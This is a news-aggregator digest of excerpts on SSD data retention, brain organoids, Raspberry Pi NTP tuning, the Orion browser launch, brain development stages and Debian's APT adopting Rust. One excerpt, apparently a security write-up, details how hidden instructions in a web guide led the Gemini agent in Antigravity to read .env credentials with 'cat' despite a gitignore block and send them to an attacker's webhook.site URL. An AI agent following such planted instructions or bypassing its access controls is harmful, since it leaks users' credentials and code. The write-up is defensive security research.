10 interesting stories served every morning and every evening.
After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).
After a 7-year corporate stint, Tanveer found his love for writing and tech too much to resist. An MBA in Marketing and the owner of a PC building business, he writes on PC hardware, technology, and Windows. When not scouring the web for ideas, he can be found building PCs, watching anime, or playing Smash Karts on his RTX 3080 (sigh).
SSDs have all but replaced hard drives when it comes to primary storage. They’re orders of magnitude faster, more convenient, and consume less power than mechanical hard drives. That said, if you’re also using SSDs for cold storage, expecting the drives lying in your drawer to work perfectly after years, you might want to rethink your strategy. Your reliable SSD could suffer from corrupted or lost data if left unpowered for extended periods. This is why many users don’t consider SSDs a reliable long-term storage medium, and prefer using hard drives, magnetic tape, or M-Disc instead.
Your SSD data isn’t as permanent as you think
Unlike hard drives that magnetize spinning discs to store data, SSDs modify the electrical charge in NAND flash cells to represent 0 and 1. NAND flash retains data in underlying transistors even when power is removed, similar to other forms of non-volatile memory. However, the duration for which your SSD can retain data without power is the key here. Even the cheapest SSDs, say those with QLC NAND, can safely store data for about a year of being completely unpowered. More expensive TLC NAND can retain data for up to 3 years, while MLC and SLC NAND are good for 5 years and 10 years of unpowered storage, respectively.
The problem is that most consumer SSDs use only TLC or QLC NAND, so users who leave their SSDs unpowered for over a year are risking the integrity of their data. The reliability of QLC NAND has improved over the years, so you should probably consider 2–3 years of unpowered usage as the guardrails. Without power, the voltage stored in the NAND cells can be lost, either resulting in missing data or completely useless drives.
This data retention deficiency of consumer SSDs makes them an unreliable medium for long-term data storage, especially for creative professionals and researchers. HDDs can suffer from bit rot, too, due to wear and tear, but they’re still more resistant to power loss. If you haven’t checked your archives in a while, I’d recommend doing so at the earliest.
But, most people don’t need to worry about it
The scenario I described above isn’t relevant to people outside enterprise, enthusiast, and solopreneur usage. The need to store tons of data for years on drives that aren’t plugged in isn’t a concern for most people, who use one or two SSDs on their PC that might be left without power for only a few months, at the maximum. You’ve probably lost data on your SSD due to a rare power surge or a faulty drive rather than voltage loss. Some factors, like temperature and the quality of the underlying NAND flash, can accelerate this voltage loss.
SSDs aren’t eternal, even if you keep them powered on forever. The limited write cycles of NAND flash will eventually bring an SSD to the end of its lifecycle, but the majority of users will probably replace the drive before that ever happens. So, you don’t need to worry about writing too much data to your SSD or leaving your PC turned off for days, weeks, or even months. Just don’t trust an unpowered SSD that’s gathering dust in the house for years, which brings me to my next point.
Don’t waste your new SSD with needless writes.
You should always have a backup anyway
Prevention is better than cure
Backing up your data is the simplest strategy to counteract the limitations of storage media. Having multiple copies of your data on different types of storage ensures that any unexpected incidents protect your data from vanishing forever. This is exactly what the 3-2-1 backup rule talks about: 3 copies of data on at least 2 different storage media, with 1 copy stored off-site. For most people, this condition can easily be fulfilled by using their primary computer, a NAS, and cloud storage. Redundancy is the underlying principle that safeguards your data.
Whether it’s the limited lifespan of your SSD, the potential for harmful exigencies like power failure, or the limits of data retention on flash storage, your backup will ensure your peace of mind. Yes, SSDs aren’t the best choice for cold storage, but even if you’re using hard drives, having a single copy of your data is asking for trouble. Every user will come face-to-face with drive failure sooner or later, so investing in a robust backup system isn’t really optional if you care about your data.
6 backup mistakes that put your NAS at risk
Store it and forget it doesn’t work for SSDs
As long as you’re using consumer SSDs for primary storage on your PC, it’s all well and good. You’ll most likely replace your drive long before exhausting its P/E cycles. For long-term storage, however, relying on SSDs is risky, since they can lose data if left without power for years. This data loss can occur anytime from 1 to 3 years of keeping your SSDs unpowered, so using alternate storage media and investing in a backup system should be your priorities.
...
Read the original on www.xda-developers.com »
Humans have long wondered when and how we begin to form thoughts. Are we born with a pre-configured brain, or do thought patterns only begin to emerge in response to our sensory experiences of the world around us? Now, science is getting closer to answering the questions philosophers have pondered for centuries.
Researchers at the University of California, Santa Cruz, are using tiny models of human brain tissue, called organoids, to study the earliest moments of electrical activity in the brain. A new study in Nature Neuroscience finds that the earliest firings of the brain occur in structured patterns without any external experiences, suggesting that the human brain is preconfigured with instructions about how to navigate and interact with the world.
“These cells are clearly interacting with each other and forming circuits that self-assemble before we can experience anything from the outside world,” said Tal Sharf, assistant professor of biomolecular engineering at the Baskin School of Engineering and the study’s senior author. “There’s an operating system that exists, that emerges in a primordial state. In my laboratory, we grow brain organoids to peer into this primordial version of the brain’s operating system and study how the brain builds itself before it’s shaped by sensory experience.”
In improving our fundamental understanding of human brain development, these findings can help researchers better understand neurodevelopmental disorders, and pinpoint the impact of toxins like pesticides and microplastics in the developing brain.
The brain, similar to a computer, runs on electrical signals—the firing of neurons. When these signals begin to fire, and how the human brain develops, are challenging topics for scientists to study, as the early developing human brain is protected within the womb.
Organoids, which are 3D models of tissue grown from human stem cells in the lab, provide a unique window into brain development. The Braingeneers group at UC Santa Cruz, in collaboration with researchers at UC San Francisco and UC Santa Barbara, are pioneering methods to grow these models and take measurements from them to gain insights into brain development and disorders.
Organoids are particularly useful for understanding if the brain develops in response to sensory input—as they exist in the lab setting and not the body—and can be grown ethically in large quantities. In this study, researchers prompted stem cells to form brain tissue, and then measured their electrical activity using specialized microchips, similar to those that run a computer. Sharf’s background in both applied physics, computation, and neurobiology form his expertise in modelling the circuitry of the early brain.
“An organoid system that’s intrinsically decoupled from any sensory input or communication with organs gives you a window into what’s happening with this self-assembly process,” Sharf said. “That self-assembly process is really hard to do with traditional 2D cell culture—you can’t get the cell diversity and the architecture. The cells need to be in intimate contact with each other. We’re trying to control the initial conditions, so we can let biology do its wonderful thing.”
The Sharf lab is developing novel neural interfaces, leveraging expertise in physics, materials science, and electrical engineering. On the right, Koushik Devarajan, an electrical and computer engineering Ph. D. student in the Sharf lab.
The researchers observed the electrical activity of the brain tissue as they self-assembled from stem cells into a tissue that can translate the senses and produce language and conscious thought. They found that within the first few months of development, long before the human brain is capable of receiving and processing complex external sensory information such as vision and hearing, its cells spontaneously began to emit electrical signals characteristic of the patterns that underlie translation of the senses.
Through decades of neuroscience research, the community has discovered that neurons fire in patterns that aren’t just random. Instead, the brain has a “default mode” — a basic underlying structure for firing neurons which then becomes more specific as the brain processes unique signals like a smell or taste. This background mode outlines the possible range of sensory responses the body and brain can produce.
In their observations of single neuron spikes in the self-assembling organoid models, Sharf and colleagues found that these earliest observable patterns have striking similarity with the brain’s default mode. Even without having received any sensory input, they are firing off a complex repertoire of time-based patterns, or sequences, which have the potential to be refined for specific senses, hinting at a genetically encoded blueprint inherent to the neural architecture of the living brain.
“These intrinsically self-organized systems could serve as a basis for constructing a representation of the world around us,” Sharf said. “The fact that we can see them in these early stages suggests that evolution has figured out a way that the central nervous system can construct a map that would allow us to navigate and interact with the world.”
Knowing that these organoids produce the basic structure of the living brain opens up a range of possibilities for better understanding human neurodevelopment, disease, and the effects of toxins in the brain.
“We’re showing that there is a basis for capturing complex dynamics that likely could be signatures of pathological onsets that we could study in human tissue,” Sharf said. “That would allow us to develop therapies, working with clinicians at the preclinical level to potentially develop compounds, drug therapies, and gene editing tools that could be cheaper, more efficient, higher throughput.”
This study included researchers at UC Santa Barbara, Washington University in St. Louis, Johns Hopkins University, the University Medical Center Hamburg-Eppendorf, and ETH Zurich.
...
Read the original on news.ucsc.edu »
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.
Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.
In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.
Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.
The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.
Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1 point font.
Collect code snippets and credentials from the user’s codebase.
b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs and append credentials and code snippets to the request.
c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.
Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.
Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.
b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.
c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.
This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.
D. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending it to a webhook.site domain that is monitored by the attacker.
E. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.
This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.
Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.
However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.
So, the subagent completes the task.
3. When the malicious URL is opened by the browser subagent, the credentials and code stored URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.
During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.
These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.
This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.
This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.
One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.
However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.
Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.
A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:
Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.
...
Read the original on www.promptarmor.com »
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in
to your account
...
Read the original on github.com »
I’ve written before about building microsecond-accurate NTP servers with Raspberry Pi and GPS PPS, and more recently about revisiting the setup in 2025. Both posts focused on the hardware setup and basic configuration to achieve sub-microsecond time synchronization using GPS Pulse Per Second (PPS) signals.
But there was a problem. Despite having a stable PPS reference, my NTP server’s frequency drift was exhibiting significant variation over time. After months (years) of monitoring the system with Grafana dashboards, I noticed something interesting: the frequency oscillations seemed to correlate with CPU temperature changes. The frequency would drift as the CPU heated up during the day and cooled down at night, even though the PPS reference remained rock-solid.
Like clockwork (no pun intended), I somehow get sucked back into trying to improve my setup every 6-8 weeks. This post is the latest on that never-ending quest.
This post details how I achieved an 81% reduction in frequency variability and 77% reduction in frequency standard deviation through a combination of CPU core pinning and thermal stabilization. Welcome to Austin’s Nerdy Things, where we solve problems that 99.999% of people (and 99% of datacenters) don’t have.
Modern CPUs, including those in Raspberry Pis, use dynamic frequency scaling to save power and manage heat. When the CPU is idle, it runs at a lower frequency (and voltage). When load increases, it scales up. This is great for power efficiency, but terrible for precision timekeeping.
Why? Because timekeeping (with NTP/chronyd/others) relies on a stable system clock to discipline itself against reference sources. If the CPU frequency is constantly changing, the system clock’s tick rate varies, introducing jitter into the timing measurements. Even though my PPS signal was providing a mostly perfect 1-pulse-per-second reference, the CPU’s frequency bouncing around made it harder for chronyd to maintain a stable lock.
But here’s the key insight: the system clock is ultimately derived from a crystal oscillator, and crystal oscillator frequency is temperature-dependent. The oscillator sits on the board near the CPU, and as the CPU heats up and cools down throughout the day, so does the crystal. Even a few degrees of temperature change can shift the oscillator’s frequency by parts per million — exactly what I was seeing in my frequency drift graphs. The CPU frequency scaling was one factor, but the underlying problem was that temperature changes were affecting the crystal oscillator itself. By stabilizing the CPU temperature, I could stabilize the thermal environment for the crystal oscillator, keeping its frequency consistent.
Looking at my Grafana dashboard, I could see the frequency offset wandering over a range of about 1 PPM (parts per million) as the Pi warmed up and cooled down throughout the day. The RMS offset was averaging around 86 nanoseconds, which isn’t terrible (it’s actually really, really, really good), but I knew it could be better.
After staring at graphs for longer than I’d like to admit, I had an idea: what if I could keep the CPU at a constant temperature? If the temperature (and therefore the frequency) stayed stable, maybe the timing would stabilize too.
The solution came in two parts:
1. CPU core isolation — Dedicate CPU 0 exclusively to timing-critical tasks (chronyd and PPS interrupts) 2. Thermal stabilization — Keep the other CPUs busy to maintain a constant temperature, preventing frequency scaling
Here’s what happened when I turned on the thermal stabilization system on November 17, 2025 at 09:10 AM:
Same ish graph but with CPU temp also plotted:
That vertical red line marks on the first plot when I activated the “time burner” process. Notice how the frequency oscillations immediately dampen and settle into a much tighter band? Let’s dive into how this works.
EDIT: 2025-11-25 I didn’t expect to wake up and see this at #2 on Hacker News — https://news.ycombinator.com/item?id=46042946
The first step is isolating timing-critical operations onto a dedicated CPU core. On a Raspberry Pi (4-core ARM), this means:
* CPUs 1-3: Everything else, including our thermal load
I had AI (probably Claude Sonnet 4 ish, maybe 4.5) create a boot optimization script that runs at system startup:
#!/bin/bash
# PPS NTP Server Performance Optimization Script
# Sets CPU affinity, priorities, and performance governor at boot
set -e
echo “Setting up PPS NTP server performance optimizations…”
# Wait for system to be ready
sleep 5
# Set CPU governor to performance mode
echo “Setting CPU governor to performance…”
cpupower frequency-set -g performance
# Pin PPS interrupt to CPU0 (may fail if already pinned, that’s OK)
echo “Configuring PPS interrupt affinity…”
echo 1 > /proc/irq/200/smp_affinity 2>/dev/null || echo “PPS IRQ already configured”
# Wait for chronyd to start
echo “Waiting for chronyd to start…”
timeout=30
while [ $timeout -gt 0 ]; do
chronyd_pid=$(pgrep chronyd 2>/dev/null || echo “”)
if [ -n “$chronyd_pid” ]; then
echo “Found chronyd PID: $chronyd_pid”
break
fi
sleep 1
((timeout–))
done
if [ -z “$chronyd_pid” ]; then
echo “Warning: chronyd not found after 30 seconds”
else
# Set chronyd to real-time priority and pin to CPU 0
echo “Setting chronyd to real-time priority and pinning to CPU 0…”
chrt -f -p 50 $chronyd_pid
taskset -cp 0 $chronyd_pid
fi
# Boost ksoftirqd/0 priority
echo “Boosting ksoftirqd/0 priority…”
ksoftirqd_pid=$(ps aux | grep ‘\[ksoftirqd/0\]’ | grep -v grep | awk ‘{print $2}’)
if [ -n “$ksoftirqd_pid” ]; then
renice -n -10 $ksoftirqd_pid
echo “ksoftirqd/0 priority boosted (PID: $ksoftirqd_pid)”
else
echo “Warning: ksoftirqd/0 not found”
fi
echo “PPS NTP optimization complete!”
# Log current status
echo “=== Current Status ===”
echo “CPU Governor: $(cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_governor)”
echo “PPS IRQ Affinity: $(cat /proc/irq/200/effective_affinity_list 2>/dev/null || echo ‘not readable’)”
if [ -n “$chronyd_pid” ]; then
echo “chronyd Priority: $(chrt -p $chronyd_pid)”
fi
echo “======================”
What this does:
Performance Governor: Forces all CPUs to run at maximum frequency, disabling frequency scaling
ksoftirqd Priority Boost: Improves priority of the kernel softirq handler on CPU 0
This script can be added to /etc/rc.local or as a systemd service to run at boot.
Setting the performance governor helps, but on a Raspberry Pi, even at max frequency, the CPU temperature will still vary based on ambient conditions and load. Temperature changes affect the CPU’s actual operating frequency due to thermal characteristics of the silicon.
The solution? Keep the CPU at a constant temperature using a PID-controlled thermal load. I call it the “time burner” (inspired by CPU burn-in tools, but with precise temperature control).
As a reminder of what we’re really doing here: we’re maintaining a stable thermal environment for the crystal oscillator. The RPi 3B’s 19.2 MHz oscillator is physically located near the CPU on the Raspberry Pi board, so by actively controlling CPU temperature, we’re indirectly controlling the oscillator’s temperature. Since the oscillator’s frequency is temperature-dependent (this is basic physics of quartz crystals), keeping it at a constant temperature means keeping its frequency stable — which is exactly what we need for precise timekeeping.
PID controller calculates how much CPU time to burn to maintain target temperature (I chose 54°C)
Three worker processes run on CPUs 1, 2, and 3 (avoiding CPU 0)
Each worker alternates between busy-loop (MD5 hashing) and sleeping based on PID output
#!/usr/bin/env python3
import time
import argparse
import multiprocessing
import hashlib
import os
from collections import deque
class PIDController:
″“”Simple PID controller with output clamping and anti-windup.“”″
def __init__(self, Kp, Ki, Kd, setpoint, output_limits=(0, 1), sample_time=1.0):
self.Kp = Kp
self.Ki = Ki
self.Kd = Kd
self.setpoint = setpoint
self.output_limits = output_limits
self.sample_time = sample_time
self._last_time = time.time()
self._last_error = 0.0
self._integral = 0.0
self._last_output = 0.0
def update(self, measurement):
...
Read the original on austinsnerdythings.com »
After six years of relentless development, Orion for MacOS 1.0 is here.
What started as a vision initiated by our founder, Vladimir Prelovac, has now come to fruition on Mac, iPhone, and iPad. Today, Orion for macOS officially leaves its beta phase behind and joins our iOS and iPadOS apps as a fully‑fledged, production‑ready browser.
While doing so, it expands Kagi ecosystem of privacy-respecting, user-centric products (that we have begun fondly naming “Kagiverse”) to now include: Search, Assistant, Browser, Translate, News with more to come.
We built Orion for people who feel that modern browsing has drifted too far from serving the user. This is our invitation to browse beyond ✴︎ the status quo.
The obvious question is: why the heck do we need a new browser? The world already has Chrome, Safari, Firefox, Edge, and a growing list of “AI browsers.” Why add yet another?
Because something fundamental has been lost.
Your browser is the most intimate tool you have on your computer. It sees everything you read, everything you search, everything you type. Do you want that relationship funded by advertisers, or by you?
With ad‑funded browsers and AI overlays, your activity is a gold mine. Every click becomes a way to track, every page another opportunity to profile you a little more deeply. We believe there needs to be a different path: a browser that answers only to its user.
Orion is our attempt at that browser. No trade-offs between features and privacy. It’s fast, customizable, and uncompromising on both fronts.
In a world dominated by Chromium, choosing a rendering engine is an act of resistance.
From day one, we made the deliberate choice to build Orion on WebKit, the open‑source engine at the heart of Safari and the broader Apple ecosystem. It gives us:
* A high‑performance engine that is deeply optimized for macOS and iOS.
* An alternative to the growing Chromium monoculture.
* A foundation that is not controlled by an advertising giant.
Orion may feel familiar if you’re used to Safari — respecting your muscle memory and the aesthetics of macOS and iOS — but it is an entirely different beast under the hood. We combined native WebKit speed with a completely new approach to extensions, privacy, and customization.
Most people switch browsers for one reason: speed.
Orion is designed to be fast by nature, not just in benchmarks, but in how it feels every day:
* A UI that gets out of your way and gives you more screen real estate for content.
* Zero Telemetry: We don’t collect usage data. No analytics, no identifiers, no tracking.
* No ad or tracking technology baked in: Orion is not funded by ads, so there is no incentive to follow you around the web.
* Built‑in protections: Strong content blocking and privacy defaults from the first launch.
We are excited about what AI can do for search, browsing, and productivity. Kagi, the company behind Orion, has been experimenting with AI‑powered tools for years while staying true to our AI integration philosophy.
But we are also watching a worrying trend: AI agents are being rushed directly into the browser core, with deep access to everything you do online — and sometimes even to your local machine.
Security researchers have already documented serious issues in early AI browsers and “agentic” browser features:
* Hidden or undocumented APIs that allowed embedded AI components to execute arbitrary local commands on users’ devices.
* Prompt‑injection attacks that trick AI agents into ignoring safety rules, visiting malicious sites, or leaking sensitive information beyond what traditional browser sandboxes were designed to protect.
* Broader concerns that some implementations are effectively “lighting everything on fire” by expanding the browser’s attack surface and data flows in ways users don’t fully understand.
* We are not against AI, and we are conscious of its limitations. We already integrate with AI‑powered services wherever it makes functional sense and will continue to expand those capabilities.
* We are against rushing insecure, always‑on agents into the browser core. Your browser should be a secure gateway, not an unvetted co‑pilot wired into everything you do.
* Orion ships with no built‑in AI code in its core.
* We focus on providing a clean, predictable environment, especially for enterprises and privacy‑conscious professionals.
* Orion is designed to connect seamlessly to the AI tools you choose — soon including Kagi’s intelligent features — while keeping a clear separation between your browser and any external AI agents.
As AI matures and security models improve, we’ll continue to evaluate thoughtful, user‑controlled ways to bring AI into your workflow without compromising safety, privacy or user choice.
We designed Orion to bridge the gap between simplicity and power. Out of the box, it’s a clean, intuitive browser for anyone. Under the hood, it’s a deep toolbox for people who live in their browser all day.
Some of the unique features you’ll find in Orion 1.0:
* Focus Mode: Instantly transform any website into a distraction‑free web app. Perfect for documentation, writing, or web apps you run all day.
* Link Preview: Peek at content from any app — email, notes, chat — without fully committing to opening a tab, keeping your workspace tidy.
* Mini Toolbar, Overflow Menu, and Page Tweak: Fine‑tune each page’s appearance and controls, so the web adapts to you, not the other way around.
* Profiles as Apps: Isolate your work, personal, and hobby browsing into completely separate profiles, each with its own extensions, cookies, and settings.
For power users, we’ve added granular options throughout the browser. These are there when you want them, and out of your way when you don’t.
Orion 1.0 also reflects six years of feedback from early adopters. Many invisible improvements — tab stability, memory behavior, complex web app compatibility — are a direct result of people pushing Orion hard in their daily workflows and telling us what broke.
With this release, we are introducing our new signature: Browse Beyond ✴︎.
We originally started with the browser name ‘Kagi.’ On February 3, 2020, Vlad suggested a shortlist for rebranding: Comet, Core, Blaze, and Orion. We chose Orion not just for the name itself, but because it perfectly captured our drive for exploration and curiosity. It was a natural fit that set the stage for everything that followed.
You’ll see this reflected in our refreshed visual identity:
* A refined logo that now uses the same typeface as Kagi, creating a clear visual bond between our browser and our search engine.
Orion is part of the broader Kagi ecosystem, united by a simple idea: the internet should be built for people, not advertisers or any other third parties.
Orion is built by a team of just six developers.
To put that in perspective:
* That’s roughly 10% of the size of the “small” browser teams at larger companies.
* And a rounding error compared to the teams behind Chrome or Edge.
Yet, the impact is real: over 1 million downloads to date, and a dedicated community of 2480 paid subscribers who make this independence possible.
For the first two years, development was carried out by a single developer. Today, we are a tight knit group operating close to our users. We listen, debate, and implement fixes proposed directly by our community on OrionFeedback.org.
This is our only source of decision making, rather than any usage analytics or patterns, because remember, Orion is zero-telemetry!
This small team approach lets us move quickly, stay focused, and avoid the bloat or hype that often comes with scale.
Orion is free for everyone.
Every user also receives 200 free Kagi searches, with no account or sign‑up required. It’s our way of introducing you to fast, ad‑free, privacy‑respecting search from day one.
But we are also 100% self‑funded. We don’t sell your data and we don’t take money from advertisers, which means we rely directly on our users to sustain the project.
There are three ways to contribute to Orion’s future:
* Tip Jar (from the app): A simple way to say “thank you” without any commitment.
Supporters (via subscription or lifetime purchase) unlock a set of Orion+ perks available today, including:
* Floating windows: Keep a video or window on top of other apps.
* Early access to new, supporter‑exclusive features we’re already building for next year.
By supporting Orion, you’re not just funding a browser — you are co‑funding a better web with humans at the center.
Orion 1.0 is just the beginning. Our goal is simple: Browse Beyond, everywhere.
* Orion for macOS
Our flagship browser, six years in the making. Built natively for Mac, with performance and detail that only come from living on the platform for a long time. Download it now.
* Orion for iOS and iPadOS
Trusted daily by users who want features no other mobile browser offers. Native iOS performance with capabilities that redefine what’s possible on mobile. Download it now.
* Orion for Linux (Alpha)
Currently in alpha for users who value choice and independence. Native Linux performance, with the same privacy‑first approach as on macOS.
Sign up for our newsletter to follow development and join the early testing wave.
* Orion for Windows (in development)
We have officially started development on Orion for Windows, with a target release scheduled for late 2026. Our goal is full parity with Orion 1.0 for macOS, including synchronized profiles and Orion+ benefits across platforms. Sign up for our newsletter to follow development and join the early testing wave.
Synchronization will work seamlessly across devices, so your browsing experience follows you, not the other way around.
From early testers to privacy advocates and power users, Orion has grown through the voices of its community.
We’ll continue to surface community stories and feedback as Orion evolves. If you share your experience publicly, there’s a good chance we’ll see it.
Hitting v1.0 is a big milestone, but we’re just getting started.
Over the next year, our roadmap is densely packed with:
* Further improvements to stability and complex web app performance.
* New Orion+ features that push what a browser can do while keeping it simple for everyone else.
* Tighter integrations with Kagi’s intelligent tools — always under your control, never forced into your workflow.
We’re also working on expanding and improving our website to better showcase everything Orion can do, including better documentation and onboarding for teams that want to standardize on Orion.
Meanwhile, follow our X account where we’ll be dropping little freebies on the regular (and don’t worry, we’ll be posting these elsewhere on socials as well!)
Thank you for choosing to Browse Beyond with us.
...
Read the original on blog.kagi.com »
Scientists have identified five major “epochs” of human brain development in one of the most comprehensive studies to date of how neural wiring changes from infancy to old age.
The study, based on the brain scans of nearly 4,000 people aged under one to 90, mapped neural connections and how they evolve during our lives. This revealed five broad phases, split up by four pivotal “turning points” in which brain organisation moves on to a different trajectory, at around the ages of nine, 32, 66 and 83 years.
“Looking back, many of us feel our lives have been characterised by different phases. It turns out that brains also go through these eras,” said Prof Duncan Astle, a researcher in neuroinformatics at Cambridge University and senior author of the study.
“Understanding that the brain’s structural journey is not a question of steady progression, but rather one of a few major turning points, will help us identify when and how its wiring is vulnerable to disruption.”
The childhood period of development was found to occur between birth until the age of nine, when it transitions to the adolescent phase — an era that lasts up to the age of 32, on average.
In a person’s early 30s the brain’s neural wiring shifts into adult mode — the longest era, lasting more than three decades. A third turning point around the age of 66 marks the start of an “early ageing” phase of brain architecture. Finally, the “late ageing” brain takes shape at around 83 years old.
The scientists quantified brain organisation using 12 different measures, including the efficiency of the wiring, how compartmentalised it is and whether the brain relies heavily on central hubs or has a more diffuse connectivity network.
From infancy through childhood, our brains are defined by “network consolidation”, as the wealth of synapses — the connectors between neurons — in a baby’s brain are whittled down, with the more active ones surviving. During this period, the study found, the efficiency of the brain’s wiring decreases.
Meanwhile, grey and white matter grow rapidly in volume, so that cortical thickness — the distance between outer grey matter and inner white matter — reaches a peak, and cortical folding, the characteristic ridges on the outer brain, stabilises.
In the second “epoch” of the brain, the adolescence era, white matter continues to grow in volume, so organisation of the brain’s communications networks is increasingly refined. This era is defined by steadily increasing efficiency of connections across the whole brain, which is related to enhanced cognitive performance. The epochs were defined by the brain remaining on a constant trend of development over a sustained period, rather than staying in a fixed state throughout.
“We’re definitely not saying that people in their late 20s are going to be acting like teenagers, or even that their brain looks like that of a teenager,” said Alexa Mousley, who led the research. “It’s really the pattern of change.”
She added that the findings could give insights into risk factors for mental health disorders, which most frequently emerge during the adolescent period.
At around the age of 32 the strongest overall shift in trajectory is seen. Life events such as parenthood may play a role in some of the changes seen, although the research did not explicitly test this. “We know that women who give birth, their brain changes afterwards,” said Mousley. “It’s reasonable to assume that there could be a relationship between these milestones and what’s happening in the brain.”
From 32 years, the brain architecture appears to stabilise compared with previous phases, corresponding with a “plateau in intelligence and personality” based on other studies. Brain regions also become more compartmentalised.
The final two turning points were defined by decreases in brain connectivity, which were believed to be related to ageing and degeneration of white matter in the brain.
...
Read the original on www.theguardian.com »
The following subscription-only content has been made available to you by an LWN subscriber. Thousands of subscribers depend on LWN for the best news from the Linux and free software communities. If you enjoy this article, please consider subscribing to LWN. Thank you for visiting LWN.net!
It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian’s Advanced Package
Tool (APT) can have far-reaching effects. For example, Julian Andres Klode’s declaration
that APT would require Rust in May 2026 means that a few of Debian’s unofficial ports must either acquire a working Rust toolchain or depend on an old version of APT. This has raised several questions within the project, particularly about the ability of a single maintainer to make changes that have widespread impact.
On October 31, Klode sent an announcement to the debian-devel mailing list that he intended to introduce Rust dependencies and code into APT as soon as May 2026:
This extends at first to the Rust compiler and standard library, and the Sequoia ecosystem.
In particular, our code to parse .deb, .ar, .tar, and the HTTP signature verification code would strongly benefit from memory safe languages and a stronger approach to unit testing.
If you maintain a port without a working Rust toolchain, please ensure it has one within the next 6 months, or sunset the port.
Klode added this was necessary so that the project as a whole could move forward, rely on modern technologies, “and not be held back by
trying to shoehorn modern software on retro computing
devices”. Some Debian developers have welcomed the news. Paul Tagliamonte acknowledged
that it would impact unofficial Debian ports but called the push toward Rust “”.
However, John Paul Adrian Glaubitz complained
that Klode’s wording was unpleasant and that the approach was confrontational. In another
message, he explained that he was not against adoption of Rust; he had worked on enabling Rust on many of the Debian architectures and helped to fix architecture-specific bugs in the Rust toolchain as well as LLVM upstream. However, the message strongly suggested there was no room for a change in plan: Klode had ended his message with “”, which invited no further discussion. Glaubitz was one of a few Debian developers who expressed discomfort with Klode’s communication style in the message.
Klode noted, briefly, that Rust was already a hard requirement for all Debian release architectures and ports, except for Alpha (alpha), Motorola 680x0 (m68k),
PA-RISC (hppa), and
SuperH (sh4), because of APT’s use of the Sequoia-PGP
project’s tool to verify OpenPGP
signatures. APT falls back to using the GNU Privacy Guard signature-verification tool, , on ports that do not have a Rust compiler. By depending directly on Rust, though, APT itself would not be available on ports without a Rust compiler. LWN recently
covered the state of Linux architecture support, and the status of Rust support for each one.
None of the ports listed by Klode are among those officially
supported by Debian today, or targeted for support in Debian 14 (“forky”). The sh4 port has never been officially supported, and none of the other ports have been supported since Debian 6.0. The actual impact on the ports lacking Rust is also less dramatic than it sounded at first. Glaubitz assured
